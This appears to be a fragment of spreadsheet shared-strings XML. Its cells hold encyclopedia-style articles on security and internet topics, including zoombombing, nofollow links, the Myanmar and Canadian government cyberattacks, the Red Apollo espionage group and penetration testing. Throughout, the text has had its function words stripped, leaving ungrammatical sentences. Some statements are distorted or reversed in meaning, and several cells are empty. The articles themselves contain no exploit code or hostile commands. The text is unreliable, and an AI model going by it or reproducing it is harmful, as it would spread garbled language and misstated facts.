well asia pacific region (indonesia, nouvelle-calédonie, australia, papua niugini) africa (malawi, mali, cameroon). when berlin wall fell 1989, another member alliance, stefan ostrowsky, transferred "net(te) bude" play word like network, 'nette bude', nice crashpad german), community training centre east-berlin, thus becoming first 'cybercafe' behind iron curtain. also milw0rm anti-nuclear movement references bastian, gerd (may 1985). "hacktivists peace movement, alliance". peace journal cnd-uk. birmingham cnd. (148): 94.anonymous, 1999 resistance transnational capital, days dissent, 2004. anonymous, friday june 18th 1999, confronting capital smashing state! archived 2016-12-21 wayback machine, article tyler(2003), dancing edge chaos: spanner works global capitalism, notes from nowhere (eds.) everywhere: irresistible rise global anticapitalism188-195. verso, london/new york 2003 isbn 1-85984-447-2 complete list actions worldwide archived 2008-02-14 wayback machine timeline london</t>
  </si>
  <si>
    <t>Nofollow</t>
  </si>
  <si>
    <t>nofollow setting page hyperlink directs search engines link page ranking calculations. specified page type link relation; rel="nofollow" ...&gt;. because search engines often calculate site's importance according number hyperlinks sites, nofollow setting allows site authors indicate presence link endorsement target site's importance. concept specification nofollow value originally suggested stop comment spam blogs. believing comment spam affected entire blogging community, early 2005 google's matt cutts blogger's jason shellen proposed value address problem.the specification nofollow copyrighted 2005–07 authors subject royalty-free patent policy, e.g. patent policy 20040205, ietf 3667 3668. example href="http://www.example.com/" rel="nofollow"&gt;link text&lt;/a&gt; introduction support google announced early 2005 hyperlinks rel="nofollow" would influence link target's pagerank. addition, yahoo bing search engines also respect attribute value.on june 2009, google software engineer matt cutts announced blog googlebot changed treats nofollowed links, order prevent webmasters using nofollow pagerank sculpting. prior this, webmasters would place nofollow tags links order maximize pagerank pages. result change, usage nofollow leads evaporation pagerank outgoing normal links started counting total links calculating page rank. system divides page rank total number outgoing links irrespective nofollow follow links, passes page rank follow normal links. cutts explained page normal links nofollow outgoing links, page rank divided links share passed normal links. however, march 2020, google treating nofollow link attribute hint, rather directive, crawling indexing purposes. interpretation individual search engines while engines nofollow value exclude links ranking calculation, details exact interpretation vary search engine search engine. google states engine general" takes "nofollow" literally "follow" link. yahoo! follows excludes ranking calculation. bing follow excludes ranking calculation. ask.com also respects attribute. baidu appears respect attribute. weblog software many weblog software packages mark reader-submitted links default (often option disable except modification software's code). more sophisticated server software could suppress nofollow links submitted trusted users like registered long time, whitelist, acceptable karma level. some server software adds rel="nofollow" pages recently edited omits stable pages, theory stable pages offending links removed human editors. widely used blogging platform wordpress versions automatically assign nofollow attribute user-submitted links (comment data, commenter uri, etc.). however, several free plugins available automatically remove nofollow attribute value. websites mediawiki software, powers wikipedia, equipped nofollow support soon initial announcement 2005. option enabled wikipedias. prominent exceptions english wikipedia. initially, discussion, decided rel="nofollow" articles blacklist instead. way, english wikipedia contributed scores pages linked expected editors link relevant pages. 2006, patch mediawiki software allowed enabling nofollow selectively namespaces. this functionality used pages considered part actual encyclopedia, discussion pages, user pages resources editors. following increasing spam problems within-foundation request co-founder jimmy wales, rel="nofollow" added article-space links january 2007. however, various interwiki templates shortcuts link wikimedia foundation projects many external wikis wikia affected policy. other websites like slashdot, high user participation, rel="nofollow" potentially misbehaving users. potential spammers posing users determined various heuristics like registered account factors. slashdot also uses poster's karma determinant attaching nofollow user-submitted links.social bookmarking photo sharing websites rel="nofollow" outgoing links include youtube digg.com (for links); websites rel="nofollow" include yahoo! 2.0, technorati favs, propeller.com longer active website). repurpose control internal pagerank flow search engine optimization professionals started using nofollow attribute control flow pagerank within website, google since corrected error, link nofollow attribute decreases pagerank page pass this practice known "pagerank sculpting". this entirely different originally intended. nofollow designed control flow pagerank website another. however, seos suggested nofollow used internal link work like nofollow used external links. several seos suggested pages "about us", "terms service", "contact us", "privacy policy" pages important enough earn pagerank, nofollow internal links pointing them. google employee matt cutts provided indirect responses subject, never publicly endorsed point view.the practice controversial challenged professionals, including shari thurow adam audette. site search proponents pointed visitors search types pages, using nofollow internal links pointing make difficult impossible visitors find pages site searches powered major search engines. although proponents nofollow internal links cited inappropriate attribution matt cutts (see matt's clarifying comment, rebutting attributed statement) support using technique, cutts never actually endorsed idea. several google employees (including matt cutts) urged webmasters focus manipulating internal pagerank. google employee adam lasnik advised webmasters better ways (e.g. click hierarchy) nofollow "sculpt pagerank", available "we're going frown upon it". youtube, google company, uses nofollow number internal "help" "share" links. qualified outbound links september 2019, google announced additional ways webmasters qualify relationship outbound hyperlinks. attribute rel="sponsored" used denote links advertisements, sponsorships compensation agreements. attribute rel="ugc", standing "user-generated content", used denote content user-contributed comments forum posts. additionally, attributes combined, rel="ugc sponsored", denoting link user-generated sponsored. 2019, wordpress announced plans convert blog comments rel="ugc".these "hint" link attributes address criticisms nofollow allowing webmasters denote outbound links lack "the weight first-party endorsement", necessarily spam. also noindex pagerank search engine optimization crawlers, also called search engine spiders spam blogs nofollow link building blocking excluding content search engines robots meta robots exclusion standard (robots.txt) references</t>
  </si>
  <si>
    <t>Zoombombing</t>
  </si>
  <si>
    <t>zoombombing zoom raiding refers unwanted, disruptive intrusion, generally internet trolls, video-conference call. typical zoombombing incident, teleconferencing session hijacked insertion material lewd, obscene, racist, misogynistic, homophobic, islamophobic, antisemitic nature, typically resulting shutdown session. term especially associated derived name zoom videoconferencing software program, also used refer phenomenon video conferencing platforms. term became popularized 2020 covid-19 pandemic forced many people stay home, videoconferencing came used large scale businesses, schools, social groups. zoombombing caused significant issues particular schools, companies, organizations worldwide. such incidents resulted increased scrutiny zoom well restrictions usage platform educational, corporate, governmental institutions globally. response, zoom, citing sudden influx users covid-19 pandemic, taking measures increase security teleconferencing application. incidents zoombombing prompted enforcement officers various countries investigate cases file criminal charges responsible. procedure term "zoombombing" derived teleconferencing application zoom, though term also used reference similar incidents teleconferencing platforms, webex skype. increased zoom covid-19 pandemic alternative face-to-face meetings resulted widespread exposure hackers internet trolls, exploit work around application's security features. various forums discord reddit, efforts coordinated disrupt zoom sessions, certain twitter accounts advertise meeting passwords meeting links (allowing users instantly join zoom meeting instead entering credentials required access meeting) sessions vulnerable joined without authorization. educational institutions, students "actively asking strangers zoombomb 'zoom raid' virtual classrooms spice isolated lessons" facilitating raids sharing passwords raiders. cnet pointed simple google searches urls include "zoom.us" could bring conferences password protected, links within public pages allow anyone join. hackers trolls also look easy targets unprotected underprotected "check-in" meetings organizations meet employers clients remotely.while zoom session progress, unfamiliar users show hijack session saying showing things lewd, obscene, racist, antisemitic nature. compromised zoom session typically shut host. many successful disrupting sessions posted video footage incidents social media video sharing platforms tiktok youtube.while believed zoombombing attacks mainly orchestrated external hackers trolls, many also orchestrated internally within respective organization entity. some view zoombombing continuation cyberbullying teenagers, particularly schools shut pandemic. responses zoombombing caused number problems schools educators, unwanted participants posting lewd content interrupt learning sessions. some schools suspend using video conferencing altogether. university southern california called zoombombing type trolling apologized "vile" events interrupted "lectures learning." zoombombing prompted colleges universities publish guides resources educate bring awareness students staff phenomenon. zoombombing left online lectures vulnerable intrusion people looking inflict harm. these crimes brought attention lack security videoconferencing platforms, also lack universities. according article guardian, university warwick, midst rape-chat scandal, received criticisms weak cybersecurity.zoombombing affected twelve-step programs alcoholics anonymous narcotics anonymous substance abuse addiction recovery programs forced switch online meetings. concerns arise causing undue stress already vulnerable population video recording break anonymity. some bombers reference drug-of-choice recovery members, alcohol, attempt emotionally trigger participants meeting.the problem reached prominence united states federal bureau investigation (fbi) warned video-teleconferencing online classroom hijacking, called "zoom-bombing." advised users teleconferencing software keep meetings private, require passwords forms access control "waiting rooms" limit access specific people, limiting screen-sharing access meeting host only. given number incidents zoombombing, york's attorney general initiated inquiry zoom's data privacy security policies. u.s. senator sherrod brown (d-oh) asked federal trade commission investigate matter, accusing zoom engaging deceptive practices regarding user privacy security.amid concerns zoombombing, various organizations banned zoom. april 2020, google banned zoom corporate computers, directing employees instead video chat google duo. zoom also banned spacex, smart communications, nasa, australian defence force. taiwanese canadian governments banned zoom government use. york city department education prohibited teachers using platform students, clark county school district nevada disabled access zoom staff. singapore's ministry education briefly banned teachers within country using zoom lifting three days later, adding extra security features. some zoombombers shared side story, claiming trying cause harm. they claim form protest response extensive amount work given teachers. incidents malicious, many shared culture, memes tiktoks, bring relief pandemic.zoom eric yuan made public apology, saying teleconferencing company anticipated sudden influx consumer users stating "this mistake lesson learned." response concerns, zoom published guide blog avoid types incidents. april 2020, zoom implemented user experience security updates application. such updates include visible "security" icon users use, suppression meeting numbers, change default settings require passwords waiting rooms sessions. april 2020, zoom announced formed council chief information security officers companies share ideas best practices, hired alex stamos, former chief security officer facebook, adviser. zoom released version april 2020 security features include 256-bit encryption, passwords default, feature report suspicious users trust safety team possible misuse. 2020, zoom announced temporarily disabled giphy (frequently used tactic zoombombing) integration security concerns could properly fully addressed. july 2020, zoom stated released safety features past days, including end-to-end encryption users, turning meeting passwords default, giving users ability choose data centers calls routed from, consulting security experts, forming ciso council, improved bounty program, working third parties help test security. criminal national authorities worldwide warned possible charges people engaging zoombombing. april 2020, teen madison, connecticut, arrested computer crime, conspiracy, disturbing peace following zoombombing incident involving online classes daniel hand high school; police also identified another teen involved incident. francisco, arrested traced pornographic videos streamed zoom. 2020, received incidents zoombombing involving child abuse, united kingdom's national crime agency reported cases. notable incidents paulus lutheran church francisco filed class-action lawsuit zoom bible study classes "zoombombed" 2020. church alleged zoom "did nothing" tried reach company.in 2022, online event hosted italian senate's movimento stelle broadcast live senato della repubblica interrupted roughly minute final fantasy pornography, displaying character tifa lockhart middle sexual intercourse. overlapping content's original audio speaking english thick italian accent stating, used offender, kindergarten teacher." also photobombing email bomb text message bomb google bombing griefing trolling references</t>
  </si>
  <si>
    <t>123 Reg</t>
  </si>
  <si>
    <t>british domain registrar hosting company founded 2000 ultimate ownership godaddy. company claims uk's largest accredited domain registrar provides internet services small- medium-sized business. from 2003 2017, part host europe group (heg). april 2017, american hosting company godaddy acquired 1.69 billion euros ($1.82 billion). history founded 2000 jonathan beresford-brealey, prior also webfusion internet solutions 1997. 2003, webfusion acquired host europe group (heg). 2004, became uk's largest domain registrar, according company's parent.in 2009, host europe group organised operations webfusion group kept brands. year, webfusion became first host offer windows server 2008 hosting, company opened £2.5 million data centre leeds. also 2009, became first domain registrar million domain names register. 2010, webfusion included sunday times's list britain's fastest-growing private-equity backed companies, deloitte buyout track 100, hosting company list. 2012, became first domain registrar million domain names register.on april 2016, admitted major deletion large number virtual private servers (vpss) caused error routine maintenance. event deleted hundreds websites, users losing sites access data service. april, situation still ongoing. during period, data breach, customers able support tickets account holders.in april 2017, american hosting company godaddy acquired reg's parent company, heg, 1.69 billion euros ($1.82 billion). references external links official website</t>
  </si>
  <si>
    <t>Privacy engineering</t>
  </si>
  <si>
    <t>privacy engineering emerging field engineering aims provide methodologies, tools, techniques ensure systems provide acceptable levels privacy. acceptable level privacy defined terms compliance functional non-functional requirements privacy policy, contractual artifact displaying data controlling entities compliance legislation fair information practices, health record security regulation privacy laws. however, general data protection regulation (gdpr) sets requirements need fulfilled. rest world, requirements change depending local implementations privacy data protection laws. definition scope definition privacy engineering given national institute standards technology (nist) focuses providing guidance used decrease privacy risks, enable organizations make purposeful decisions resource allocation effective implementation controls information systems. while privacy developing legal domain, privacy engineering really come fore recent years necessity implementing said privacy laws information systems become definite requirement deployment information systems. example, ipen outlines position respect reason lack attention privacy issues development lack appropriate tools best practices. developers deliver quickly order minimize time market effort, often re-use existing components, despite privacy flaws. there are, unfortunately, building blocks privacy-friendly applications services, security often weak well. privacy engineering involves aspects process management, security, ontology software engineering. actual application derives necessary legal compliances, privacy policies 'manifestos' privacy-by-design. towards implementation levels, privacy engineering employs privacy enhancing technologies enable anonymisation de-identification data. privacy engineering requires suitable security engineering practices deployed, privacy aspects implemented using security techniques. privacy impact assessment another tool within context imply privacy engineering practiced. area concern proper definition application terms personal data, personally identifiable information, anonymisation pseudo-anonymisation lack sufficient detailed enough meanings applied software, information systems data sets. another facet information system privacy ethical systems particular concern surveillance, data collection, artificial intelligence etc. some members privacy privacy engineering community advocate idea ethics engineering reject possibility engineering privacy systems intended surveillance. software engineers often encounter problems interpreting legal norms current technology. legal requirements nature neutral technology, case legal conflict interpreted court context current status technology privacy practice. core practices particular field still infancy somewhat dominated legal aspects, following list outlines primary areas privacy engineering based: data flow modelling development suitable terminologies/ontologies expressing types, usages, purposes etc. information privacy impact assessment (pia) privacy management processes requirements engineering risk assessment semanticsdespite lack cohesive development areas, courses already exist training privacy engineering. international workshop privacy engineering co-located ieee symposium security privacy provides venue address "the research practice systematizing evaluating approaches capture address privacy issues engineering information systems".a number approaches privacy engineering exist. linddun methodology takes risk-centric approach privacy engineering personal data flows risk identified secured privacy controls. guidance interpretation gdpr provided gdpr recitals, coded decision tool maps gdpr software engineering forces goal identify suitable privacy design patterns. approach uses eight privacy design strategies four technical four administrative strategies protect data implement data subject rights. aspects information privacy engineering particularly concerned processing information following aspects ontologies relations implementation software: data processing ontologies information type ontologies opposed machine types) notions controller processor notions authority identity (ostensibly source(s) data) provenance information, including notion data subject purpose information, viz: primary secondary collection semantics information data sets (see also noise anonymisation) usage informationfurther affect security classification, risk classification thus levels protection flow within system metricised calculated. definitions privacy privacy area dominated legal aspects requires implementation using, ostensibly, engineering techniques, disciplines skills. privacy engineering overall discipline takes basis considering privacy legal aspect engineering aspect unification also utilizing following areas: privacy philosophical aspect privacy economic aspect, particularly game theory privacy sociological aspect legal basis impetus technological progress privacy engineering stems general privacy laws various particular legal acts: children's online privacy protection driver's privacy protection intimate privacy protection online privacy protection privacy 1974 privacy protection 1980 telephone records privacy protection 2006 video privacy protection also data protection directive information security risk management free open mooc course module privacy design management karlstad university's privacy design on-line course. notes references</t>
  </si>
  <si>
    <t>2010 cyberattacks on Myanmar</t>
  </si>
  <si>
    <t>2010 cyberattacks myanmar (also known burma) distributed denial-of-service attacks (ddos) began october, occurring ahead 2010 burmese general election, widely viewed sham election. this election first burma years. attacks significantly larger attacks estonia georgia 2007 2008 respectively. attack followed similar february 2010, also followed incident total loss connection internet previous spring submarine communications cable severed accidentally. attacks beginning october 2010 over period week, large-scale massive ddos attack targeted burma's main internet provider, ministry post telecommunication. successful attacks network interfered majority incoming outgoing network traffic. motivation attacks, hence culprits, unclear, significant speculation blamed burmese government pre-emptive attack disrupt internet access general elections. ruling military junta, state peace development council (spdc), known denying universal human rights freedom expression; government's efforts silence dissent extended cyberspace, restrictive systems internet control asia. fact international observers foreign journalists allowed country cover polls raised suspicions burma's military authorities could trying restrict flow information election period. technical details ddos attack attempts flood information gateway data exceeding bandwidth. "distributed" element distributed denial service means involves spread world. these enslaved computers, called "botnets," usually home computers hijacked compromised virus. botnets usually rented cyber criminals various purposes, includes attacks. they controlled across internet. size october–november 2010 attacks increased daily 10-15 gbit/s, daily attack lasting eight hours (always regular office hours), computers across globe. this several hundred times enough overwhelm country's mbit/s terrestrial satellite links. attacks blogging websites september also order gbit/s.by comparison, 2007 cyberattacks estonia mbit/s, lasting minute hours. cyberattacks burma prior 2010 election this cyber attack notably followed similar february 2010, internet link service myanmar's yatanarpon teleport company struck, also followed incident total loss connection internet previous spring submarine communications cable severed accidentally.despite heavy hand regime wields cyberspace, information communication technologies (icts) provided burmese opposition groups means challenge government broadcasting message world. there ongoing battle liberation technologies authoritarian government. 2000, burmese political activists received numerous e-mails contained viruses, many believe part organised campaign perpetrated state agents. first major example ddos attack burma 2007, saffron revolution burmese activists managed videos pictures demonstrations government crackdown internet, time government severed internet connection almost weeks.near one-year anniversary saffron revolution, websites three main burmese independent media organisations attacked effectively silenced. democratic voice burma irrawaddy made inaccessible ddos attack, website mizzima news defaced. through 2009 2010, attacks burmese opposition media sites continued periodically. timing attacks nature websites attacked indicate political connection. although identity attackers remain unknown, widely believed government played role. this belief still held, burmese government consistently made efforts control censor communications environment country. also, timing co-ordination attacks around anniversary saffron revolution suggests motivation prevent websites commemorating protests possibly mobilising political actions.in september 2010, coinciding third anniversary saffron revolution, websites belonging independent opposition news sites blogs brought ddos attacks similar less powerful than, ones took place prior election. september 2010, ddos used specifically news websites burma: democratic voice burma irrawaddy magazine. both magazines providers independent coverage current affairs burma. these attacks believed originate burmese government, election month away, media workers feared attack test leading election. 2009, burma ranked countries reporters without borders (rsf) press freedom index. also internet burma references</t>
  </si>
  <si>
    <t>2011 Canadian government hackings</t>
  </si>
  <si>
    <t>february 2011, news sources revealed government canada suffered cyber attacks foreign hackers using addresses china. hackers managed infiltrate three departments within government transmit classified information back them. attacks resulted government cutting internet access departments affected various responses canadian government chinese government. history 2010 memo canadian security intelligence service (csis) 2009 released public warned cyber attacks canadian government, university, industry computers showing growth 2009 threat cyber attacks "one fastest growing complicated issues" facing csis. minister public safety toews stated january 2011 cyber attacks serious threat canada attacks government computers grown "quite substantial." fall 2010 federal government began strategize ways prevent cyber attacks create response plans, would include million five years combating cyber threats.auditor general sheila fraser previously warned federal government's computer systems risk breached. 2002 stated government's internet security adequate warned "weaknesses system" urged improving security deal vulnerabilities. 2005 said government still "translate policies standards consistent, cost-effective practices result secure environment departments agencies." cyber attack cyber attack first detected january 2011 implemented phishing scheme. emails seemingly innocuous attachments sent, supposedly known public servants. attachments contained malware infected computer exfiltrated information passwords. this information, sent back hackers, could used remotely access computer forward email (with infecting attachment) onto others order proliferate virus. affected departments included treasury board federal finance department, well agency advising canadian armed forces science technology. once detected, canadian cybersecurity officials shut internet access departments order halt exfiltration information hijacked computers. this left thousands public servants without internet access.while cyber attacks traced back chinese addresses, knowing whether hackers chinese, nationality routing cybercrimes china cover tracks". response when attacks detected internet access departments shut prevent stolen information sent back hackers. prime minister's office claimed hackers made "attempt access" servers comment further. spokesman treasury board minister stockwell said indications data related canadians compromised. csis officials advised government name china attacker talk attacks, government official stated chinese espionage become problem canada countries.on february prime minister stephen harper stated government strategy place evolve systems would attack become sophisticated" cyber attacks growing issue importance, country, across world." day, stockwell also stated attacks aggressive [attack] significant one, significant going financial records."the chinese government denied involvement attacks. foreign ministry spokesman zhaoxu said press conference february chinese government opposes hacking criminal acts, saying "the allegation china supports hacking groundless." also cyber attack paris summit references</t>
  </si>
  <si>
    <t>Cloud workload protection platform</t>
  </si>
  <si>
    <t>cloud workload protection platform (cwpp) computer security software aimed securing (potentially virtual) computer machines. cwpps usually agent-based, meaning software agent running permanently within machine protected, collecting security-relevant data events sending cloud-based service. cloud-based service monitors machines supervision, derives alerts notifies users corresponding potential security threats. gartner maintains list cwpp vendor-based solutions. vendor solutions trend micro deep security palo alto networks prisma cloud workload protection broadcom/symantec cloud workload protection mcafee cloud workload security security. agentless cloud security solution claims solution contains encompasses needs many categories cloud security products, including cwpp. references</t>
  </si>
  <si>
    <t>Privacy and the Internet of things</t>
  </si>
  <si>
    <t>Red Cross cyberattack</t>
  </si>
  <si>
    <t>january 2022 international committee cross made appeal hackers stolen private data, saying would speak "directly confidentially" responsible attack. hackers stolen private data 515,000 vulnerable people least cross crescent societies. proof data leaked, icrc said gravest concern risk posed exposing data.the attack aimed swiss contractor stores data.the perpetrators identified. impact icrc suspended access compromised computer systems part restoring family links programme, targeted attack. spokesman said utmost ensure business continuity resumption services soon possible". references external links sophisticated cyber-attack targets cross crescent data 500,000 people www.icrc.org cyberattack international committee cross www.redcross.org</t>
  </si>
  <si>
    <t>2013 South Korea cyberattack</t>
  </si>
  <si>
    <t>Red Apollo</t>
  </si>
  <si>
    <t>apollo (also known mandiant), menupass fireeye), stone panda crowdstrike), potassium microsoft)) chinese state-sponsored cyberespionage group. 2018 indictment united states department justice claimed group linked tianjin field office chinese government's ministry state security, operating since 2006.the team designated fireeye advanced persistent threat. fireeye states target aerospace, engineering, telecom firms government believe rival china. fireeye stated could targeting intellectual property educational institutions japanese university likely expand operations education sector jurisdictions nations allied united states. fireeye claimed tracked since 2009, however low-threat nature posed, priority. fireeye describes group threat organizations worldwide." tactics group directly targets managed information technology service providers (msps) using rat. general role help manage company's computer network. msps often compromised poison ivy, fakemicrosoft, plugx, artief, graftor, chches, spear-phishing emails. history 2014 2017: operation cloud hopper operation cloud hopper extensive attack theft information 2017 directed msps united kingdom (u.k.), united states (u.s.), japan, canada, brazil, france, switzerland, norway, finland, sweden, south africa, india, thailand, south korea australia. group used msp's intermediaries acquire assets trade secrets msp-client engineering, industrial manufacturing, retail, energy, pharmaceuticals, telecommunications, government agencies. operation cloud hopper used variants backdoors, malware trojans. these delivered spear-phishing emails. attacks scheduled tasks leveraged services/utilities persist microsoft windows systems even computer system rebooted. installed malware hacking tools access systems steal data. 2016 navy personnel data hackers accessed records relating 130,000 navy personnel (out 330,000). under actions navy decided coordinate hewlett packard enterprise services, despite warnings given prior breach. affected sailors required notified. 2018 indictments 2018 indictment showed evidence cvnx name group, alias hackers. both used four aliases make appear five hackers attacked. post-indictment activities april 2019 apt10 targeted government private organizations philippines.in 2020 symantec implicated apollo series attacks targets japan.in march 2021, targeted bharat biotech serum institute india (sii), world's largest vaccine maker. also china–united states relations cyberwarfare china references</t>
  </si>
  <si>
    <t>Penetration test</t>
  </si>
  <si>
    <t>penetration test, colloquially known test ethical hacking, authorized simulated cyberattack computer system, performed evaluate security system; confused vulnerability assessment. test performed identify weaknesses (also referred vulnerabilities), including potential unauthorized parties gain access system's features data, well strengths, enabling full risk assessment completed. process typically identifies target systems particular goal, reviews available information undertakes various means attain goal. penetration test target white (about background system information provided advance tester) black (about basic information—if any—other company name provided). gray penetration test combination (where limited knowledge target shared auditor). penetration test help identify system's vulnerabilities attack estimate vulnerable is.security issues penetration test uncovers reported system owner. penetration test reports also assess potential impacts organization suggest countermeasures reduce risk.the national cyber security center describes penetration testing method gaining assurance security system attempting breach system's security, using tools techniques adversary might."the goals penetration test vary depending type approved activity given engagement, primary goal focused finding vulnerabilities could exploited nefarious actor, informing client vulnerabilities along recommended mitigation strategies.penetration tests component full security audit. example, payment card industry data security standard requires penetration testing regular schedule, system changes. penetration testing also support risk assessments outlined nist risk management framework 800-53.several standard frameworks methodologies exist conducting penetration tests. these include open source security testing methodology manual (osstmm), penetration testing execution standard (ptes), nist special publication 800-115, information system security assessment framework (issaf) owasp testing guide. flaw hypothesis methodology systems analysis penetration prediction technique list hypothesized flaws software system compiled analysis specifications documentation system. list hypothesized flaws prioritized basis estimated probability flaw actually exists, ease exploiting extent control compromise. prioritized list used direct actual testing system. there different types penetration testing, depending upon goal organization include: network (external internal), wireless, application, social engineering, remediation verification. history 1960s, growing popularity time-sharing computer systems made resources accessible communication lines created security concerns. scholars deborah russell gangemi explain, "the 1960s marked true beginning computer security.": june 1965, example, several u.s.'s leading computer security experts held first major conferences system security—hosted government contractor, system development corporation (sdc). during conference, someone noted employee able easily undermine various system safeguards added sdc's an/fsq-32 time-sharing computer system. hopes system security study would useful, attendees requested "...studies conducted areas breaking security protection time-shared system." words, conference participants initiated first formal requests computer penetration tool studying system security.: spring 1967 joint computer conference, many leading computer specialists discuss system security concerns. during conference, computer security experts willis ware, harold petersen, rein turn, rand corporation, bernard peters national security agency (nsa), used phrase "penetration" describe attack computer system. paper, ware referred military's remotely accessible time-sharing systems, warning "deliberate attempts penetrate computer systems must anticipated." colleagues petersen turn shared concerns, observing online communication systems "...are vulnerable threats privacy," including "deliberate penetration." bernard peters made point, insisting computer input output "...could provide large amounts information penetrating program." during conference, computer penetration would become formally identified major threat online computer systems.: threat computer penetration posed next outlined major report organized united states department defense (dod) late 1967. essentially, officials turned willis ware lead task force experts nsa, cia, dod, academia, industry formally assess security time-sharing computer systems. relying many papers presented spring 1967 joint computer conference, task force largely confirmed threat system security computer penetration posed. ware's report initially classified, many country's leading computer experts quickly identified study definitive document computer security. jeffrey yost charles babbage institute recently described ware report "...by important thorough study technical operational issues regarding secure computing systems time period." effect, ware report reaffirmed major threat posed computer penetration online time-sharing computer systems. better understand system weaknesses, federal government contractors soon began organizing teams penetrators, known tiger teams, computer penetration test system security. deborah russell gangemi stated 1970s "...'tiger teams' first emerged computer scene. tiger teams government industry-sponsored teams crackers attempted break defenses computer systems effort uncover, eventually patch, security holes.": leading scholar history computer security, donald mackenzie, similarly points that, "rand done penetration studies (experiments circumventing computer security controls) early time-sharing systems behalf government." jeffrey yost charles babbage institute, work history computer security, also acknowledges rand corporation "engaged first so-called 'penetration studies' infiltrate time-sharing systems order test vulnerability." virtually early studies, tiger teams successfully broke targeted computer systems, country's time-sharing systems poor defenses. early tiger team actions, efforts rand corporation demonstrated usefulness penetration tool assessing system security. time, rand analyst noted tests "...demonstrated practicality system-penetration tool evaluating effectiveness adequacy implemented data security safeguards." addition, number rand analysts insisted penetration test exercises offered several benefits justified continued use. noted paper, penetrator seems develop diabolical frame mind search operating system weaknesses incompleteness, difficult emulate." reasons others, many analysts rand recommended continued study penetration techniques usefulness assessing system security.: presumably leading computer penetration expert formative years james anderson, worked nsa, rand, government agencies study system security. early 1971, u.s. force contracted anderson's private company study security time-sharing system pentagon. study, anderson outlined number major factors involved computer penetration. anderson described general attack sequence steps: find exploitable vulnerability. design attack around test attack. seize line use. enter attack. exploit entry information recovery.over time, anderson's description general computer penetration steps helped guide many security experts, relied technique assess time-sharing computer system security.: following years, computer penetration tool security assessment became refined sophisticated. early 1980s, journalist william broad briefly summarized ongoing efforts tiger teams assess system security. broad reported, dod-sponsored report willis ware "...showed spies could actively penetrate computers, steal copy electronic files subvert devices normally guard top-secret information. study touched decade quiet activity elite groups computer scientists working government tried break sensitive computers. they succeeded every attempt."while various studies suggested computer security u.s. remained major problem, scholar edward hunt recently made broader point extensive study computer penetration security tool. hunt suggests recent paper history penetration testing defense establishment ultimately "...created many tools used modern cyberwarfare," carefully defined researched many ways computer penetrators could hack targeted systems.: tools wide variety security assessment tools available assist penetration testing, including free-of-charge, free software, commercial software. specialized distributions several operating system distributions geared towards penetration testing. such distributions typically contain pre-packaged pre-configured tools. penetration tester hunt individual tool, might increase risk complications—such compile errors, dependency issues, configuration errors. also, acquiring additional tools practical tester's context. notable penetration testing examples include: blackarch based arch linux backbox based ubuntu kali linux (replaced backtrack december 2012) based debian parrot security based debian pentoo based gentoo whax based slackwaremany specialized operating systems facilitate penetration testing—each less dedicated specific field penetration testing. number linux distributions include known application vulnerabilities, deployed targets practice against. such systems help security professionals latest security tools environment. examples include damn vulnerable linux (dvl), owasp testing environment (wtw), metasploitable. software frameworks backbox hping metasploit project nessus nmap owasp saint w3af penetration testing phases process penetration testing simplified following five phases: reconnaissance: gathering important information target system. this information used better attack target. example, open source search engines used find data used social engineering attack. scanning: uses technical tools attacker's knowledge system. example, nmap used scan open ports. gaining access: using data gathered reconnaissance scanning phases, attacker payload exploit targeted system. example, metasploit used automate attacks known vulnerabilities. maintaining access: maintaining access requires taking steps involved able persistently within target environment order gather much data possible. covering tracks: attacker must clear trace compromising victim system, type data gathered, events, order remain anonymous.once attacker exploited vulnerability gain access machines process repeats i.e. look vulnerabilities attempt exploit them. this process referred pivoting. vulnerabilities legal operations tester execute illegal operation include unescaped commands, unchanged hashed passwords source-visible projects, human relationships, hashing cryptographic functions. single flaw enough enable critically serious exploit. leveraging multiple known flaws shaping payload appears valid operation almost always required. metasploit provides ruby library common tasks, maintains database known exploits. when working budget time constraints, fuzzing common technique discovers vulnerabilities. aims unhandled error random input. tester uses random input access less often used code paths. well-trodden code paths usually free errors. errors useful either expose information, http server crashes full info trace-backs—or directly usable, buffer overflows. imagine website text input boxes. vulnerable injections certain strings. submitting random strings boxes hopefully bugged code path. error shows broken html page half rendered error. case, text boxes treated input streams. however, software systems many possible input streams, cookie session data, uploaded file stream, channels, memory. errors happen input streams. test goal first unhandled error understand flaw based failed test case. testers write automated tool test understanding flaw correct. after that, become obvious package payload target system triggers execution. viable, hope another error produced fuzzer yields fruit. fuzzer saves time checking adequate code paths exploits unlikely. payload illegal operation, payload metasploit terminology, include functions logging keystrokes, taking screenshots, installing adware, stealing credentials, creating backdoors using shellcode, altering data. some companies maintain large databases known exploits provide products automatically test target systems vulnerabilities: metasploit nessus nmap openvas w3af standardized government penetration test services general services administration (gsa) standardized "penetration test" service pre-vetted support service, rapidly address potential vulnerabilities, stop adversaries impact federal, state local governments. these services commonly referred highly adaptive cybersecurity services (hacs) listed advantage website.this effort identified service providers technically reviewed vetted provide advanced penetration services. this service intended improve rapid ordering deployment services, reduce government contract duplication, protect support infrastructure timely efficient manner. 132-45a penetration testing security testing service assessors mimic real-world attacks identify methods circumventing security features application, system, network. hacs penetration testing services typically strategically test effectiveness organization's preventive detective security measures employed protect assets data. part service, certified ethical hackers typically conduct simulated attack system, systems, applications another target environment, searching security weaknesses. after testing, typically document vulnerabilities outline defenses effective defeated exploited. penetration testing services standardized professional bodies working collaboration national cyber security centre. outcomes penetration tests vary depending standards methodologies used. there five penetration testing standards: open source security testing methodology manual (osstmm), open application security project (owasp), national institute standards technology (nist00), information system security assessment framework (issaf), penetration testing methodologies standards (ptes). also risk ithc tiger team white (computer security) general references long, johnny (2011). google hacking penetration testers, elsevier definitive guide penetration testing references</t>
  </si>
  <si>
    <t>Cloud computing security</t>
  </si>
  <si>
